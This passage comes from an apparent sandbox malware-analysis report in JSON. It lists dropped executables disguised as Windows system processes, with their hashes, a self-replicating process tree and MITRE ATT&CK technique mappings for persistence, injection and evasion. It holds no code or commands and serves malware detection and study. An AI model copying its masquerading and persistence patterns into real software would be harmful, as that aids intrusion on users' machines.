(GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 163903, "sha256": "c862812cb66c49029ded882ccc58137ad54dfa008eadb53d1e33e8c61efd9b51", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_size": 163903, "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "smss.exe", "file_size": 163903, "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "csrss.exe", "file_size": 163903, "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE50BB.bin", "file_size": 163903, "sha256": "c862812cb66c49029ded882ccc58137ad54dfa008eadb53d1e33e8c61efd9b51", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 163903, "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4E8F.bin", "file_size": 163903, "sha256": "464eb65617e0d90722485b71e4a5fbf5edb94f668959d27c388f1b22b87065b3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 163903, "sha256": "23dfc72b08e7c9724848ee35583465cd4526866bc691a880e3b92999d9aba795", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)", "7 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8041)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (9 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005884", "name": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe", "normalized_path": "C:\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe", "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9"}, {"uid": "00000000-00005856", "parentuid": "00000000-00005884", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "121557a5a6064a200e85f01888227687e0c1252e983a581d679f001fc63fe98b"}, {"uid": "00000000-00006136", "parentuid": "00000000-00005856", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "121557a5a6064a200e85f01888227687e0c1252e983a581d679f001fc63fe98b"}, {"uid": "00000000-00005952", "parentuid": "00000000-00005856", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "40d83ecc5779bfc4d12a34bb160c57f2d12d82eb2a69c3e4f823d0cebfa973b8"}, {"uid": "00000000-00004284", "parentuid": "00000000-00005856", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "cd2ff65e9f34430290d5557e7cb2dbd6c6fd7e932e1a1d200eabbc49235c70cb"}, {"uid": "00000000-00005984", "parentuid": "00000000-00005856", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00003256", "parentuid": "00000000-00005984", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "121557a5a6064a200e85f01888227687e0c1252e983a581d679f001fc63fe98b"}, {"uid": "00000000-00001720", "parentuid": "00000000-00005984", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "40d83ecc5779bfc4d12a34bb160c57f2d12d82eb2a69c3e4f823d0cebfa973b8"}, {"uid": "00000000-00003416", "parentuid": "00000000-00005984", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "cd2ff65e9f34430290d5557e7cb2dbd6c6fd7e932e1a1d200eabbc49235c70cb"}, {"uid": "00000000-00003920", "parentuid": "00000000-00005984", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00003888", "parentuid": "00000000-00005984", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "e6a50327597d4d0484da18d52afafabd6fa050e90b9f1b99cf5de8f075995959"}, {"uid": "00000000-00004060", "parentuid": "00000000-00005984", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00003732", "parentuid": "00000000-00005984", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "27cce3e1162d32894a71fd380f129ea15b2b1e0e348a853de2d326caa673444b"}, {"uid": "00000000-00002208", "parentuid": "00000000-00005856", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "e6a50327597d4d0484da18d52afafabd6fa050e90b9f1b99cf5de8f075995959"}, {"uid": "00000000-00001800", "parentuid": "00000000-00005856", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00002484", "parentuid": "00000000-00001800", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "121557a5a6064a200e85f01888227687e0c1252e983a581d679f001fc63fe98b"}, {"uid": "00000000-00002840", "parentuid": "00000000-00001800", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "40d83ecc5779bfc4d12a34bb160c57f2d12d82eb2a69c3e4f823d0cebfa973b8"}, {"uid": "00000000-00002008", "parentuid": "00000000-00001800", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "cd2ff65e9f34430290d5557e7cb2dbd6c6fd7e932e1a1d200eabbc49235c70cb"}, {"uid": "00000000-00003556", "parentuid": "00000000-00002008", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00003508", "parentuid": "00000000-00001800", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00003564", "parentuid": "00000000-00003508", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00002348", "parentuid": "00000000-00003564", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00003252", "parentuid": "00000000-00003564", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "2120a70eb6daf0edf0cc554bcc1796d724b4972527715df770ec5510964f52fd"}, {"uid": "00000000-00004760", "parentuid": "00000000-00001800", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "e6a50327597d4d0484da18d52afafabd6fa050e90b9f1b99cf5de8f075995959"}, {"uid": "00000000-00003104", "parentuid": "00000000-00001800", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00001144", "parentuid": "00000000-00001800", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00006080", "parentuid": "00000000-00005856", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "27cce3e1162d32894a71fd380f129ea15b2b1e0e348a853de2d326caa673444b"}, {"uid": "00000000-00002060", "parentuid": "00000000-00005884", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "40d83ecc5779bfc4d12a34bb160c57f2d12d82eb2a69c3e4f823d0cebfa973b8"}, {"uid": "00000000-00004180", "parentuid": "00000000-00002060", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "121557a5a6064a200e85f01888227687e0c1252e983a581d679f001fc63fe98b"}, {"uid": "00000000-00004136", "parentuid": "00000000-00002060", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "40d83ecc5779bfc4d12a34bb160c57f2d12d82eb2a69c3e4f823d0cebfa973b8"}, {"uid": "00000000-00003928", "parentuid": "00000000-00002060", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "cd2ff65e9f34430290d5557e7cb2dbd6c6fd7e932e1a1d200eabbc49235c70cb"}, {"uid": "00000000-00003800", "parentuid": "00000000-00002060", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00004316", "parentuid": "00000000-00002060", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "e6a50327597d4d0484da18d52afafabd6fa050e90b9f1b99cf5de8f075995959"}, {"uid": "00000000-00003820", "parentuid": "00000000-00002060", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00003424", "parentuid": "00000000-00002060", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "27cce3e1162d32894a71fd380f129ea15b2b1e0e348a853de2d326caa673444b"}, {"uid": "00000000-00006124", "parentuid": "00000000-00005884", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "cd2ff65e9f34430290d5557e7cb2dbd6c6fd7e932e1a1d200eabbc49235c70cb"}, {"uid": "00000000-00003456", "parentuid": "00000000-00006124", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "121557a5a6064a200e85f01888227687e0c1252e983a581d679f001fc63fe98b"}, {"uid": "00000000-00004036", "parentuid": "00000000-00006124", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "40d83ecc5779bfc4d12a34bb160c57f2d12d82eb2a69c3e4f823d0cebfa973b8"}, {"uid": "00000000-00003232", "parentuid": "00000000-00006124", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "cd2ff65e9f34430290d5557e7cb2dbd6c6fd7e932e1a1d200eabbc49235c70cb"}, {"uid": "00000000-00003924", "parentuid": "00000000-00006124", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00001416", "parentuid": "00000000-00006124", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "e6a50327597d4d0484da18d52afafabd6fa050e90b9f1b99cf5de8f075995959"}, {"uid": "00000000-00001884", "parentuid": "00000000-00006124", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00002160", "parentuid": "00000000-00006124", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "27cce3e1162d32894a71fd380f129ea15b2b1e0e348a853de2d326caa673444b"}, {"uid": "00000000-00006048", "parentuid": "00000000-00005884", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00004084", "parentuid": "00000000-00005884", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "e6a50327597d4d0484da18d52afafabd6fa050e90b9f1b99cf5de8f075995959"}, {"uid": "00000000-00004188", "parentuid": "00000000-00004084", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "121557a5a6064a200e85f01888227687e0c1252e983a581d679f001fc63fe98b"}, {"uid": "00000000-00004392", "parentuid": "00000000-00004084", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "40d83ecc5779bfc4d12a34bb160c57f2d12d82eb2a69c3e4f823d0cebfa973b8"}, {"uid": "00000000-00000884", "parentuid": "00000000-00004084", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "cd2ff65e9f34430290d5557e7cb2dbd6c6fd7e932e1a1d200eabbc49235c70cb"}, {"uid": "00000000-00001820", "parentuid": "00000000-00004084", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00001748", "parentuid": "00000000-00004084", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "e6a50327597d4d0484da18d52afafabd6fa050e90b9f1b99cf5de8f075995959"}, {"uid": "00000000-00002752", "parentuid": "00000000-00004084", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00002524", "parentuid": "00000000-00004084", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "27cce3e1162d32894a71fd380f129ea15b2b1e0e348a853de2d326caa673444b"}, {"uid": "00000000-00002824", "parentuid": "00000000-00004084", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9"}, {"uid": "00000000-00000688", "parentuid": "00000000-00004084", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c862812cb66c49029ded882ccc58137ad54dfa008eadb53d1e33e8c61efd9b51"}, {"uid": "00000000-00004204", "parentuid": "00000000-00005884", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00004152", "parentuid": "00000000-00005884", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "27cce3e1162d32894a71fd380f129ea15b2b1e0e348a853de2d326caa673444b"}, {"uid": "00000000-00001688", "parentuid": "00000000-00004152", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "121557a5a6064a200e85f01888227687e0c1252e983a581d679f001fc63fe98b"}, {"uid": "00000000-00000712", "parentuid": "00000000-00004152", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "40d83ecc5779bfc4d12a34bb160c57f2d12d82eb2a69c3e4f823d0cebfa973b8"}, {"uid": "00000000-00003688", "parentuid": "00000000-00004152", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "cd2ff65e9f34430290d5557e7cb2dbd6c6fd7e932e1a1d200eabbc49235c70cb"}, {"uid": "00000000-00001092", "parentuid": "00000000-00004152", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00003916", "parentuid": "00000000-00004152", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "e6a50327597d4d0484da18d52afafabd6fa050e90b9f1b99cf5de8f075995959"}, {"uid": "00000000-00002496", "parentuid": "00000000-00004152", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "678c009245e5c06a3329fc9b8b675f7f01ec17a640acaee92fb3ad411b432490"}, {"uid": "00000000-00002968", "parentuid": "00000000-00004152", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "27cce3e1162d32894a71fd380f129ea15b2b1e0e348a853de2d326caa673444b"}, {"uid": "00000000-00003296", "parentuid": "00000000-00005884", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": 